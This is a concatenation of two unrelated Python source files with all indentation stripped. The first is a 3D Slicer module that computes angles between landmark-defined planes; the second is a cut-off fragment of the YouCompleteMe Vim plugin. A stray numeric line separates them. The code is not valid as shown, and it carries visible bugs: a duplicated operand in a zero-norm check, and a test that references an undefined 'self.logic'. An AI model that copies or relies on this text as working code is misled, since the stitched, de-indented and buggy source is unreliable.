compNode = slicer.mrmlScene.GetNthNodeByClass(n, 'vtkMRMLSliceCompositeNode')
compNode.SetBackgroundVolumeID(sampleVolumeNode.GetID())
def onAddMidPoint(self):
f1 = self.landmarkComboBox1MidPoint.currentText
f2 = self.landmarkComboBox2MidPoint.currentText
p1 = f1[0:f1.find("-")]
print p1
fidlist1 = slicer.mrmlScene.GetNodesByClassByName('vtkMRMLMarkupsFiducialNode', p1).GetItemAsObject(0)
index1 = fidlist1.GetMarkupIndexByID(self.midPointFiducialDictionaryID[f1])
coord1 = numpy.zeros(3)
fidlist1.GetNthFiducialPosition(index1, coord1)
p2 = f2[0:f2.find("-")]
print p2
fidlist2 = slicer.mrmlScene.GetNodesByClassByName('vtkMRMLMarkupsFiducialNode', p2).GetItemAsObject(0)
index2 = fidlist2.GetMarkupIndexByID(self.midPointFiducialDictionaryID[f2])
coord2 = numpy.zeros(3)
fidlist2.GetNthFiducialPosition(index2, coord2)
coord = coord1 + coord2
coord /= 2
fidlist1.AddFiducial(coord[0], coord[1], coord[2])
if p1 != p2:
fidlist2.AddFiducial(coord[0], coord[1], coord[2])
fidlist2.SetNthFiducialVisibility(fidlist2.GetNumberOfFiducials() - 1, False)
def onFiducialAddedMidPoint(self, obj, event):
fidlist = obj
label = fidlist.GetNthFiducialLabel(fidlist.GetNumberOfFiducials() - 1)
self.midPointFiducialDictionaryID[label] = fidlist.GetNthMarkupID(fidlist.GetNumberOfFiducials() - 1)
self.landmarkComboBox1MidPoint.addItem(label)
self.landmarkComboBox2MidPoint.addItem(label)
def onFiducialRemovedMidPoint(self, obj, event):
fidlist = obj
print obj
for i in range(1, self.landmarkComboBox1MidPoint.count):
print i
label = self.landmarkComboBox1MidPoint.itemText(i)
found = self.fiducialInListMidPoint(label, fidlist)
if not found:
del self.midPointFiducialDictionaryID[label]
self.landmarkComboBox1MidPoint.removeItem(i)
self.landmarkComboBox2MidPoint.removeItem(i)
break
def fiducialInListMidPoint(self, name, fidlist):
for i in range(0, fidlist.GetNumberOfFiducials()):
if name == fidlist.GetNthFiducialLabel(i) :
return True
return False
def onCloseScene(self, obj, event):
keys = self.planeControlsDictionary.keys()
for i in range(0, len(keys)):
self.planeControlsDictionary[keys[i]].remove()
del self.planeControlsDictionary[keys[i]]
globals()[self.moduleName] = slicer.util.reloadScriptedModule(self.moduleName)
def angleValue(self):
self.valueComboBox()
self.getAngle_RL.setText(self.logic.angle_degre_RL)
self.getAngle_RL_comp.setText(self.logic.angle_degre_RL_comp)
self.getAngle_SI.setText(self.logic.angle_degre_SI)
self.getAngle_SI_comp.setText(self.logic.angle_degre_SI_comp)
self.getAngle_AP.setText(self.logic.angle_degre_AP)
self.getAngle_AP_comp.setText(self.logic.angle_degre_AP_comp)
def valueComboBox(self):
colorPlane1 = self.planeComboBox1.currentText
colorPlane2 = self.planeComboBox2.currentText
print colorPlane1
print colorPlane2
redslice = slicer.mrmlScene.GetNodeByID('vtkMRMLSliceNodeRed')
redslice.SetWidgetVisible(False)
yellowslice = slicer.mrmlScene.GetNodeByID('vtkMRMLSliceNodeYellow')
yellowslice.SetWidgetVisible(False)
greenslice = slicer.mrmlScene.GetNodeByID('vtkMRMLSliceNodeGreen')
greenslice.SetWidgetVisible(False)
self.defineAngle(colorPlane1,colorPlane2)
def modify(self, obj, event):
self.defineAngle(self.planeComboBox1.currentText, self.planeComboBox2.currentText)
def defineAngle(self, colorPlane1, colorPlane2):
print "DEFINE ANGLE"
print colorPlane1
if colorPlane1 in self.logic.ColorNodeCorrespondence:
slice1 = slicer.util.getNode(self.logic.ColorNodeCorrespondence[colorPlane1])
self.logic.getMatrix(slice1)
slice1.SetWidgetVisible(True)
matrix1 = self.logic.getMatrix(slice1)
normal1 = self.logic.defineNormal(matrix1)
else:
normal1 = self.planeControlsDictionary[colorPlane1].logic.N
print colorPlane2
if colorPlane2 in self.logic.ColorNodeCorrespondence:
slice2 = slicer.util.getNode(self.logic.ColorNodeCorrespondence[colorPlane2])
self.logic.getMatrix(slice2)
slice2.SetWidgetVisible(True)
matrix2 = self.logic.getMatrix(slice2)
normal2 = self.logic.defineNormal(matrix2)
else:
normal2 = self.planeControlsDictionary[colorPlane2].logic.N
self.logic.getAngle(normal1, normal2)
def onSavePlanes(self):
self.savePlanes()
def savePlanes(self, filename = None):
tempDictionary = {}
sliceRed = slicer.util.getNode(self.logic.ColorNodeCorrespondence['red'])
tempDictionary["red"] = self.logic.getMatrix(sliceRed).tolist()
sliceYellow = slicer.util.getNode(self.logic.ColorNodeCorrespondence['yellow'])
tempDictionary["yellow"] = self.logic.getMatrix(sliceYellow).tolist()
sliceGreen = slicer.util.getNode(self.logic.ColorNodeCorrespondence['green'])
tempDictionary["green"] = self.logic.getMatrix(sliceGreen).tolist()
tempDictionary["customPlanes"] = {}
for key, plane in self.planeControlsDictionary.items():
tempDictionary["customPlanes"][plane.id] = plane.getFiducials()
print filename
if filename is None:
filename = qt.QFileDialog.getSaveFileName(parent=self, caption='Save file')
if filename != "":
fileObj = open(filename, "wb")
pickle.dump(tempDictionary, fileObj)
fileObj.close()
def onReadPlanes(self):
self.readPlanes()
def readPlanes(self, filename=None):
if filename is None:
filename = qt.QFileDialog.getOpenFileName(parent=self,caption='Open file')
if filename != "":
fileObj = open(filename, "rb")
tempDictionary = pickle.load( fileObj )
node = slicer.mrmlScene.GetNodeByID('vtkMRMLSliceNodeRed')
matList = tempDictionary["red"]
matNode = node.GetSliceToRAS()
for col in range(0, len(matList)):
for row in range(0, len(matList[col])):
matNode.SetElement(col, row, matList[col][row])
node = slicer.mrmlScene.GetNodeByID('vtkMRMLSliceNodeYellow')
matList = tempDictionary["yellow"]
matNode = node.GetSliceToRAS()
for col in range(0, len(matList)):
for row in range(0, len(matList[col])):
matNode.SetElement(col, row, matList[col][row])
node = slicer.mrmlScene.GetNodeByID('vtkMRMLSliceNodeGreen')
matList = tempDictionary["green"]
matNode = node.GetSliceToRAS()
for col in range(0, len(matList)):
for row in range(0, len(matList[col])):
matNode.SetElement(col, row, matList[col][row])
customPlanes = tempDictionary["customPlanes"]
for key, fidlist in customPlanes.items():
self.addNewPlane(key)
tempkey = "Plane " + str(self.planeControlsId)
currentFidList = self.planeControlsDictionary[tempkey].logic.getFiducialList()
for i in range(0, len(fidlist)):
f = fidlist[i]
currentFidList.AddFiducial(f[0], f[1], f[2])
fileObj.close()
# This widget controls each of the planes that are added to the interface.
# The widget contains its own logic, i.e. an object of AnglePlanesLogic.
# Each plane contains a separate fiducial list. The planes are named P1, P2, ..., PN. The landmarks are named
# P1-1, P1-2, P1-N.
class AnglePlanesWidgetPlaneControl(qt.QFrame):
def __init__(self, anglePlanes, id, pointlocatordictionary):
qt.QFrame.__init__(self)
self.id = id
self.setLayout(qt.QFormLayout())
self.pointLocatorDictionary = pointlocatordictionary
landmarkLayout = qt.QHBoxLayout()
planeLabel = qt.QLabel('Plane ' + str(id) + ":")
landmarkLayout.addWidget(planeLabel)
self.logic = AnglePlanesLogic(id)
label1 = qt.QLabel(' L1:')
self.landmark1ComboBox = qt.QComboBox()
landmark1ComboBox = self.landmark1ComboBox
landmark1ComboBox.addItem("Select")
landmark1ComboBox.connect('currentIndexChanged(QString)', self.placePlaneClicked)
landmarkLayout.addWidget(label1)
landmarkLayout.addWidget(landmark1ComboBox)
label2 = qt.QLabel(' L2:')
self.landmark2ComboBox = qt.QComboBox()
landmark2ComboBox = self.landmark2ComboBox
landmark2ComboBox.addItem("Select")
landmark2ComboBox.connect('currentIndexChanged(QString)', self.placePlaneClicked)
landmarkLayout.addWidget(label2)
landmarkLayout.addWidget(landmark2ComboBox)
label3 = qt.QLabel(' L3:')
self.landmark3ComboBox = qt.QComboBox()
landmark3ComboBox = self.landmark3ComboBox
landmark3ComboBox.addItem("Select")
landmark3ComboBox.connect('currentIndexChanged(QString)', self.placePlaneClicked)
landmarkLayout.addWidget(label3)
landmarkLayout.addWidget(landmark3ComboBox)
addFiducialLabel = qt.QLabel('Add')
addFiducialButton = qt.QPushButton(qt.QIcon(":/Icons/MarkupsAddFiducial.png"), " ")
addFiducialButton.setFixedSize(50,25)
addFiducialButton.connect('clicked()', self.addLandMarkClicked)
addFiducialButton.setEnabled(True)
landmarkLayout.addWidget(addFiducialLabel)
landmarkLayout.addWidget(addFiducialButton)
#fiducial list for the plane
fidNode = self.logic.getFiducialList()
for i in range(0, fidNode.GetNumberOfFiducials()):
label = fidNode.GetNthFiducialLabel(i)
landmark1ComboBox.addItem(label)
landmark2ComboBox.addItem(label)
landmark3ComboBox.addItem(label)
anglePlanes.landmarkComboBox1MidPoint.addItem(label)
anglePlanes.landmarkComboBox2MidPoint.addItem(label)
anglePlanes.midPointFiducialDictionaryID[label] = fidNode.GetNthMarkupID(i)
fidNode.AddObserver(fidNode.MarkupAddedEvent, self.onFiducialAdded)
fidNode.AddObserver(fidNode.MarkupRemovedEvent, self.onFiducialRemoved)
self.setPointModifiedEventId = fidNode.AddObserver(fidNode.PointModifiedEvent, self.onPointModifiedEvent)
# This observers are in AnglePlaneWidgets, they listen to any fiducial being added
#
fidNode.AddObserver(fidNode.MarkupAddedEvent, anglePlanes.onFiducialAddedMidPoint)
fidNode.AddObserver(fidNode.MarkupRemovedEvent, anglePlanes.onFiducialRemovedMidPoint)
self.layout().addRow(landmarkLayout)
self.slider = ctk.ctkSliderWidget()
slider = self.slider
slider.singleStep = 0.1
slider.minimum = 0.1
slider.maximum = 10
slider.value = 1.0
slider.toolTip = "Set the size of your plane."
self.slideOpacity = ctk.ctkSliderWidget()
slideOpacity = self.slideOpacity
slideOpacity.singleStep = 0.1
slideOpacity.minimum = 0.1
slideOpacity.maximum = 1
slideOpacity.value = 1.0
slideOpacity.toolTip = "Set the opacity of your plane."
slider.connect('valueChanged(double)', self.placePlaneClicked)
slideOpacity.connect('valueChanged(double)', self.placePlaneClicked)
landmarkSliderLayout = qt.QHBoxLayout()
label = qt.QLabel(' Size:')
label2 = qt.QLabel(' Opacity:')
landmarkSliderLayout.addWidget(label)
landmarkSliderLayout.addWidget(self.slider)
landmarkSliderLayout.addWidget(label2)
landmarkSliderLayout.addWidget(self.slideOpacity)
self.surfaceDeplacementCheckBox = qt.QCheckBox("On Surface")
self.surfaceDeplacementCheckBox.setChecked(True)
self.surfaceDeplacementCheckBox.connect('stateChanged(int)', self.onSurfaceDeplacementStateChanged)
landmarkSliderLayout.addWidget(self.surfaceDeplacementCheckBox)
self.layout().addRow(landmarkSliderLayout)
def remove(self):
self.logic.remove()
def onFiducialRemoved(self, obj, event):
fidlist = obj
for i in range(1, self.landmark1ComboBox.count):
#print i
found = self.fiducialInList(self.landmark1ComboBox.itemText(i), fidlist)
if not found:
self.landmark1ComboBox.removeItem(i)
self.landmark2ComboBox.removeItem(i)
self.landmark3ComboBox.removeItem(i)
break
def getFiducials(self):
fidNode = self.logic.getFiducialList()
listCoord = list()
coord = numpy.zeros(3)
fidNode.GetNthFiducialPosition(int(self.landmark1ComboBox.currentIndex)-1, coord)
listCoord.append(coord)
fidNode.GetNthFiducialPosition(int(self.landmark2ComboBox.currentIndex)-1, coord)
listCoord.append(coord)
fidNode.GetNthFiducialPosition(int(self.landmark3ComboBox.currentIndex)-1, coord)
listCoord.append(coord)
return listCoord
def placePlaneClicked(self):
self.update()
def fiducialInList(self, name, fidlist):
for i in range(0, fidlist.GetNumberOfFiducials()):
if name == fidlist.GetNthFiducialLabel(i) :
return True
return False
def projectAllFiducials(self):
fidlist = self.logic.getFiducialList()
for i in range(0, fidlist.GetNumberOfFiducials()):
self.projectFiducialOnClosestSurface(fidlist, i, self.pointLocatorDictionary)
def onPointModifiedEvent(self, obj, event):
if self.surfaceDeplacementCheckBox.isChecked():
self.projectAllFiducials()
self.update();
def onSurfaceDeplacementStateChanged(self):
if self.surfaceDeplacementCheckBox.isChecked():
self.projectAllFiducials()
self.update()
def update(self):
# print "landmarks index " + str(self.landmark1ComboBox.currentIndex) + ", " + str(self.landmark2ComboBox.currentIndex) + ", " + str(self.landmark3ComboBox.currentIndex) + ", "
if self.landmark1ComboBox.currentIndex > 0 and self.landmark2ComboBox.currentIndex > 0 and self.landmark3ComboBox.currentIndex > 0:
self.logic.planeLandmarks(self.landmark1ComboBox.currentIndex, self.landmark2ComboBox.currentIndex, self.landmark3ComboBox.currentIndex, self.slider.value, self.slideOpacity.value)
def projectFiducialOnClosestSurface(self, fidlist, fidid, pointLocatorDictionary):
landmarkCoord = numpy.zeros(3)
fidlist.GetNthFiducialPosition(fidid, landmarkCoord)
minDistance = MAXINT
minClosestPoint = numpy.zeros(3)
#print "landmark: " + str(landmarkCoord) + ", fidid: " + str(fidid)
keys = pointLocatorDictionary.keys()
for i in range(0, len(keys)):
locator = pointLocatorDictionary[keys[i]]
closestpointid = locator.FindClosestPoint(landmarkCoord)
mrmlmodelcollection = slicer.mrmlScene.GetNodesByClassByName("vtkMRMLModelNode", keys[i])
modelnode = mrmlmodelcollection.GetItemAsObject(0)
closestpoint = modelnode.GetPolyData().GetPoints().GetPoint(closestpointid)
#print "closestpointid:" + str(closestpointid) + ", point: " + str(closestpoint)
distance = numpy.linalg.norm( closestpoint - landmarkCoord )
#print "distance: " + str(distance)
if distance < minDistance:
minDistance = distance
minClosestPoint = closestpoint
if minClosestPoint[0] !=landmarkCoord[0] or minClosestPoint[1] != landmarkCoord[1] or minClosestPoint[2] != landmarkCoord[2]:
fidlist.RemoveObserver(self.setPointModifiedEventId)
fidlist.SetNthFiducialPosition(fidid, minClosestPoint[0], minClosestPoint[1], minClosestPoint[2])
self.setPointModifiedEventId = fidlist.AddObserver(fidlist.PointModifiedEvent, self.onPointModifiedEvent)
def addLandMarkClicked(self):
#print "Add landmarks"
# # Place landmarks in the 3D scene
fidlist = self.logic.getFiducialList()
slicer.mrmlScene.AddNode(fidlist)
interactionNode = slicer.mrmlScene.GetNodeByID("vtkMRMLInteractionNodeSingleton")
interactionNode.SetCurrentInteractionMode(1)
def onFiducialAdded(self, obj, event):
fidlist = obj
label = fidlist.GetNthFiducialLabel(fidlist.GetNumberOfFiducials() - 1)
self.landmark1ComboBox.addItem(label)
self.landmark2ComboBox.addItem(label)
self.landmark3ComboBox.addItem(label)
class AnglePlanesLogic(ScriptedLoadableModuleLogic):
def __init__(self, id = -1):
self.ColorNodeCorrespondence = {'red': 'vtkMRMLSliceNodeRed',
'yellow': 'vtkMRMLSliceNodeYellow',
'green': 'vtkMRMLSliceNodeGreen'}
self.id = id
self.initialize()
def initialize(self):
self.layoutManager=slicer.app.layoutManager()
self.threeDWidget=self.layoutManager.threeDWidget(0)
self.threeDView=self.threeDWidget.threeDView()
self.renderWindow=self.threeDView.renderWindow()
self.renderers=self.renderWindow.GetRenderers()
self.renderer=self.renderers.GetFirstRenderer()
self.polydata = vtk.vtkPolyData()
self.points = vtk.vtkPoints()
self.planeSource = vtk.vtkPlaneSource()
self.mapper = vtk.vtkPolyDataMapper()
self.actor = vtk.vtkActor()
self.renderer.AddViewProp(self.actor)
self.renderWindow.AddRenderer(self.renderer)
def remove(self):
self.renderer.RemoveViewProp(self.actor)
self.renderer.Render()
def getFiducialList(self):
P = self.getFiducialListName()
nodes = slicer.mrmlScene.GetNodesByClassByName('vtkMRMLMarkupsFiducialNode', P)
if nodes.GetNumberOfItems() == 0:
# The list does not exist so we create it
fidNode = slicer.vtkMRMLMarkupsFiducialNode()
fidNode.SetName(P)
slicer.mrmlScene.AddNode(fidNode)
else:
#The list exists but the observers must be updated
fidNode = nodes.GetItemAsObject(0)
return fidNode
def getFiducialListName(self) :
return "P" + str(self.id)
def getMatrix(self, slice):
self.mat = slice.GetSliceToRAS()
print self.mat
#---------------------- RED SLICE -----------------------#
# Matrix with the elements of SliceToRAS
m = numpy.matrix([[self.mat.GetElement(0,0), self.mat.GetElement(0,1), self.mat.GetElement(0,2), self.mat.GetElement(0,3)],
[self.mat.GetElement(1,0), self.mat.GetElement(1,1), self.mat.GetElement(1,2), self.mat.GetElement(1,3)],
[self.mat.GetElement(2,0), self.mat.GetElement(2,1), self.mat.GetElement(2,2), self.mat.GetElement(2,3)],
[self.mat.GetElement(3,0), self.mat.GetElement(3,1), self.mat.GetElement(3,2), self.mat.GetElement(3,3)]])
return m
def defineNormal(self, matrix):
# Normal vector to the Red slice:
n_vector = numpy.matrix([[0],[0],[1],[1]])
# point on the Red slice:
A = numpy.matrix([[0], [0], [0], [1]])
normalVector = matrix * n_vector
#print "n : \n", normalVector
A = matrix * A
normalVector1 = normalVector
normalVector1[0] = normalVector[0] - A[0]
normalVector1[1] = normalVector[1] - A[1]
normalVector1[2] = normalVector[2] - A[2]
#print normalVector1
return normalVector1
def getAngle(self, normalVect1, normalVect2):
norm1 = sqrt(normalVect1[0]*normalVect1[0]+normalVect1[1]*normalVect1[1]+normalVect1[2]*normalVect1[2])
#print "norme 1: \n", norm1
norm2 =sqrt(normalVect2[0]*normalVect2[0]+normalVect2[1]*normalVect2[1]+normalVect2[2]*normalVect2[2])
#print "norme 2: \n", norm2
scalar_product = (normalVect1[0]*normalVect2[0]+normalVect1[1]*normalVect2[1]+normalVect1[2]*normalVect2[2])
#print "scalar product : \n", scalar_product
angle = acos(scalar_product/(norm1*norm2))
#print "radian angle : ", angle
angle_degree = angle*180/pi
#print "Angle in degree", angle_degree
norm1_RL = sqrt(normalVect1[1]*normalVect1[1]+normalVect1[2]*normalVect1[2])
#print "norme RL: \n", norm1_RL
norm2_RL =sqrt(normalVect2[1]*normalVect2[1]+normalVect2[2]*normalVect2[2])
#print "norme RL: \n", norm2_RL
if (norm1_RL ==0 or norm1_RL ==0):
self.angle_degre_RL = 0
self.angle_degre_RL_comp = 0
else:
scalar_product_RL = (normalVect1[1]*normalVect2[1]+normalVect1[2]*normalVect2[2])
#print "scalar product : \n", scalar_product_RL
angleRL = acos(scalar_product_RL/(norm1_RL*norm2_RL))
#print "radian angle : ", angleRL
self.angle_degre_RL = angleRL*180/pi
self.angle_degre_RL = round(self.angle_degre_RL,2)
#print self.angle_degre_RL
self.angle_degre_RL_comp = 180-self.angle_degre_RL
norm1_SI = sqrt(normalVect1[0]*normalVect1[0]+normalVect1[1]*normalVect1[1])
#print "norme1_SI : \n", norm1_SI
norm2_SI =sqrt(normalVect2[0]*normalVect2[0]+normalVect2[1]*normalVect2[1])
#print "norme2_SI : \n", norm2_SI
if (norm1_SI ==0 or norm2_SI ==0):
self.angle_degre_SI = 0
self.angle_degre_SI_comp = 0
else:
scalar_product_SI = (normalVect1[0]*normalVect2[0]+normalVect1[1]*normalVect2[1])
#print "scalar product_SI : \n", scalar_product_SI
angleSI = acos(scalar_product_SI/(norm1_SI*norm2_SI))
#print "radian angle : ", angleSI
self.angle_degre_SI = angleSI*180/pi
self.angle_degre_SI = round(self.angle_degre_SI,2)
#print self.angle_degre_SI
self.angle_degre_SI_comp = 180-self.angle_degre_SI
#print self.angle_degre_SI_comp
norm1_AP = sqrt(normalVect1[0]*normalVect1[0]+normalVect1[2]*normalVect1[2])
#print "norme1_SI : \n", norm1_AP
norm2_AP =sqrt(normalVect2[0]*normalVect2[0]+normalVect2[2]*normalVect2[2])
#print "norme2_SI : \n", norm2_AP
if (norm1_AP ==0 or norm2_AP ==0):
self.angle_degre_AP = 0
self.angle_degre_AP_comp = 0
else:
scalar_product_AP = (normalVect1[0]*normalVect2[0]+normalVect1[2]*normalVect2[2])
#print "scalar product_SI : \n", scalar_product_AP
#print "VALUE :", scalar_product_AP/(norm1_AP*norm2_AP)
angleAP = acos(scalar_product_AP/(norm1_AP*norm2_AP))
#print "radian angle : ", angleAP
self.angle_degre_AP = angleAP*180/pi
self.angle_degre_AP = round(self.angle_degre_AP,2)
#print self.angle_degre_AP
self.angle_degre_AP_comp = 180-self.angle_degre_AP
def normalLandmarks(self, GA, GB):
Vn = numpy.matrix([[0],[0],[0]])
Vn[0] = GA[1]*GB[2] - GA[2]*GB[1]
Vn[1] = GA[2]*GB[0] - GA[0]*GB[2]
Vn[2] = GA[0]*GB[1] - GA[1]*GB[0]
#print "Vn = ",Vn
norm_Vn = sqrt(Vn[0]*Vn[0]+Vn[1]*Vn[1]+Vn[2]*Vn[2])
Normal = Vn/norm_Vn
#print "N = ",Normal
return Normal
def defineNormal(self, matrix):
# Normal vector to the Red slice:
n_vector = numpy.matrix([[0],[0],[1],[1]])
# point on the Red slice:
A = numpy.matrix([[0], [0], [0], [1]])
normalVector = matrix * n_vector
#print "n : \n", normalVector
A = matrix * A
normalVector1 = normalVector
normalVector1[0] = normalVector[0] - A[0]
normalVector1[1] = normalVector[1] - A[1]
normalVector1[2] = normalVector[2] - A[2]
#print normalVector1
return normalVector1
def planeLandmarks(self, Landmark1Value, Landmark2Value, Landmark3Value, slider, sliderOpacity):
# Limit the number of 3 landmarks to define a plane
# Keep the coordinates of the landmarks
fidNode = self.getFiducialList()
r1 = 0
a1 = 0
s1 = 0
coord = numpy.zeros(3)
if Landmark1Value != 0:
fidNode.GetNthFiducialPosition(int(Landmark1Value)-1, coord)
r1 = coord[0]
a1 = coord[1]
s1 = coord[2]
# Limit the number of 3 landmarks to define a plane
# Keep the coordinates of the landmarks
r2 = 0
a2 = 0
s2 = 0
if Landmark2Value != 0:
fidNode.GetNthFiducialPosition(int(Landmark2Value)-1, coord)
r2 = coord[0]
a2 = coord[1]
s2 = coord[2]
# Limit the number of 3 landmarks to define a plane
# Keep the coordinates of the landmarks
r3 = 0
a3 = 0
s3 = 0
if Landmark3Value != 0:
fidNode.GetNthFiducialPosition(int(Landmark3Value)-1, coord)
r3 = coord[0]
a3 = coord[1]
s3 = coord[2]
points = self.points
if points.GetNumberOfPoints() == 0:
points.InsertNextPoint(r1,a1,s1)
points.InsertNextPoint(r2,a2,s2)
points.InsertNextPoint(r3,a3,s3)
else:
points.SetPoint(0, r1,a1,s1)
points.SetPoint(1, r2,a2,s2)
points.SetPoint(2, r3,a3,s3)
polydata = self.polydata
polydata.SetPoints(points)
centerOfMass = vtk.vtkCenterOfMass()
centerOfMass.SetInputData(polydata)
centerOfMass.SetUseScalarsAsWeights(False)
centerOfMass.Update()
G = centerOfMass.GetCenter()
#print "Center of mass = ",G
A = (r1,a1,s1)
B = (r2,a2,s2)
C = (r3,a3,s3)
# Vector GA
GA = numpy.matrix([[0],[0],[0]])
GA[0] = A[0]-G[0]
GA[1] = A[1]-G[1]
GA[2] = A[2]-G[2]
#print "GA = ", GA
# Vector BG
GB = numpy.matrix([[0],[0],[0]])
GB[0] = B[0]-G[0]
GB[1] = B[1]-G[1]
GB[2] = B[2]-G[2]
#print "GB = ", GB
# Vector CG
GC = numpy.matrix([[0],[0],[0]])
GC[0] = C[0]-G[0]
GC[1] = C[1]-G[1]
GC[2] = C[2]-G[2]
#print "GC = ", GC
self.N = self.normalLandmarks(GA,GB)
D = numpy.matrix([[0],[0],[0]])
E = numpy.matrix([[0],[0],[0]])
F = numpy.matrix([[0],[0],[0]])
D[0] = slider*GA[0] + G[0]
D[1] = slider*GA[1] + G[1]
D[2] = slider*GA[2] + G[2]
#print "Slider value : ", slider
#print "D = ",D
E[0] = slider*GB[0] + G[0]
E[1] = slider*GB[1] + G[1]
E[2] = slider*GB[2] + G[2]
#print "E = ",E
F[0] = slider*GC[0] + G[0]
F[1] = slider*GC[1] + G[1]
F[2] = slider*GC[2] + G[2]
#print "F = ",F
planeSource = self.planeSource
planeSource.SetNormal(self.N[0],self.N[1],self.N[2])
planeSource.SetOrigin(D[0],D[1],D[2])
planeSource.SetPoint1(E[0],E[1],E[2])
planeSource.SetPoint2(F[0],F[1],F[2])
planeSource.Update()
plane = planeSource.GetOutput()
mapper = self.mapper
mapper.SetInputData(plane)
mapper.Update()
self.actor.SetMapper(mapper)
self.actor.GetProperty().SetColor(0, 0.4, 0.8)
self.actor.GetProperty().SetOpacity(sliderOpacity)
self.renderer.Render()
self.renderWindow.Render()
class AnglePlanesTest(ScriptedLoadableModuleTest):
def setUp(self):
# reset the state - clear scene
slicer.mrmlScene.Clear(0)
def runTest(self):
# run all tests needed
self.setUp()
self.test_AnglePlanes()
def test_AnglePlanes(self):
self.delayDisplay('Starting the test')
self.delayDisplay('Adding planes')
widget = AnglePlanesWidget()
widget.addNewPlane()
widget.addNewPlane()
self.delayDisplay('Adding fiducials')
fidlist1 = slicer.mrmlScene.GetNodesByClassByName('vtkMRMLMarkupsFiducialNode', "P1").GetItemAsObject(0)
fidlist1.AddFiducial(10,10,10)
fidlist1.AddFiducial(20,20,20)
fidlist1.AddFiducial(10,20,30)
fidlist2 = slicer.mrmlScene.GetNodesByClassByName('vtkMRMLMarkupsFiducialNode', "P2").GetItemAsObject(0)
fidlist2.AddFiducial(50,50,50)
fidlist2.AddFiducial(40,20,80)
fidlist2.AddFiducial(10,40,20)
self.delayDisplay('Saving planes')
widget.savePlanes("test.p")
self.delayDisplay('Loading planes')
widget.readPlanes("test.p")
self.delayDisplay('Selecting fiducials')
widget.planeControlsDictionary["Plane 1"].landmark1ComboBox.setCurrentIndex(1)
widget.planeControlsDictionary["Plane 1"].landmark2ComboBox.setCurrentIndex(2)
widget.planeControlsDictionary["Plane 1"].landmark3ComboBox.setCurrentIndex(3)
widget.planeControlsDictionary["Plane 2"].landmark1ComboBox.setCurrentIndex(1)
widget.planeControlsDictionary["Plane 2"].landmark2ComboBox.setCurrentIndex(2)
widget.planeControlsDictionary["Plane 2"].landmark3ComboBox.setCurrentIndex(3)
self.delayDisplay('Selecting planes')
widget.planeComboBox1.setCurrentIndex(5)
widget.planeComboBox2.setCurrentIndex(6)
self.delayDisplay('Calculating angle')
widget.angleValue()
test = widget.logic.angle_degre_RL != 59.06 or widget.logic.angle_degre_RL_comp != 120.94 or widget.logic.angle_degre_SI != 12.53 or widget.logic.angle_degre_SI_comp != 167.47 or widget.logic.angle_degre_AP != 82.56 or widget.logic.angle_degre_AP_comp != 97.44
self.delayDisplay('Testing angles')
if test:
print "", "Angle", "Complementary"
print "R-L-View", self.logic.angle_degre_RL, self.logic.angle_degre_RL_comp
print "S-I-View", self.logic.angle_degre_SI, self.logic.angle_degre_SI_comp
print "A-P-View", self.logic.angle_degre_AP, self.logic.angle_degre_AP_comp
self.delayDisplay('Test Failure!')
else:
self.delayDisplay('Test passed!')
widget.parent.close()
| 0.009627 |
# Copyright (C) 2011, 2012 Google Inc.
#
# This file is part of YouCompleteMe.
#
# YouCompleteMe is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# YouCompleteMe is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with YouCompleteMe. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import * # noqa
from future.utils import iteritems
from ycm import vimsupport
from ycmd import user_options_store
from ycmd import request_wrap
from ycmd import identifier_utils
YCM_VAR_PREFIX = 'ycm_'
def BuildServerConf():
"""Builds a dictionary mapping YCM Vim user options to values. Option names
don't have the 'ycm_' prefix."""
# We only evaluate the keys of the vim globals and not the whole dictionary
# to avoid unicode issues.
# See https://github.com/Valloric/YouCompleteMe/pull/2151 for details.
keys = vimsupport.GetVimGlobalsKeys()
server_conf = {}
for key in keys:
if not key.startswith( YCM_VAR_PREFIX ):
continue
new_key = key[ len( YCM_VAR_PREFIX ): ]
new_value = vimsupport.VimExpressionToPythonType( 'g:' + key )
server_conf[ new_key ] = new_value
return server_conf
def LoadJsonDefaultsIntoVim():
defaults = user_options_store.DefaultOptions()
for key, value in iteritems( defaults ):
new_key = 'g:ycm_' + key
if not vimsupport.VariableExists( new_key ):
vimsupport.SetVariableValue( new_key, value )
def CompletionStartColumn():
return ( request_wrap.CompletionStartColumn(
vimsupport.CurrentLineContents(),
vimsupport.CurrentColumn() + 1,
vimsupport.CurrentFiletypes()[ 0 ] ) - 1 )
def CurrentIdentifierFinished():
current_column = vimsupport.CurrentColumn()
previous_char_index = current_column - 1
if previous_char_index < 0:
return True
line = vimsupport.CurrentLineContents()
filetype = vimsupport.CurrentFiletypes()[ 0 ]
regex = identifier_utils.IdentifierRegexForFiletype( filetype )
for match in regex.finditer( line ):
if match.end() == previous_char_index:
return True
# If the whole line is whitespace, that means the user probably finished an
# identifier on the previous line.
return line[ : current_column ].isspace()
def LastEnteredCharIsIdentifierChar():
current_column = vimsupport.CurrentColumn()
if current_column - 1 < 0:
return False
line = vimsupport.CurrentLineContents()
filetype = vimsupport.CurrentFiletypes()[ 0 ]
return (
identifier_utils.StartOfLongestIdentifierEndingAtIndex(
line, current_column, filetype ) != current_column )
def AdjustCandidateInsertionText( candidates ):
"""This function adjusts the candidate insertion text to take into account the
text that's currently in front of the cursor.
For instance ('|' represents the cursor):
1. Buffer state: 'foo.|bar'
2. A completion candidate of 'zoobar' is shown and the user selects it.
3. Buffer state: 'foo.zoobar|bar' instead of 'foo.zoo|bar' which is what the
user wanted.
This function changes candidates to resolve that issue.
It could be argued that the user actually wants the final buffer state to be
'foo.zoobar|' (the cursor at the end), but that would be much more difficult
to implement and is probably not worth doing.
"""
def NewCandidateInsertionText( to_insert, text_after_cursor ):
overlap_len = OverlapLength( to_insert, text_after_cursor )
if overlap_len:
return to_insert[ :-overlap_len ]
return to_insert
text_after_cursor = vimsupport.TextAfterCursor()
if not text_after_cursor:
return candidates
new_candidates = []
for candidate in candidates:
if isinstance( candidate, dict ):
new_candidate = candidate.copy()
if 'abbr' not in new_candidate:
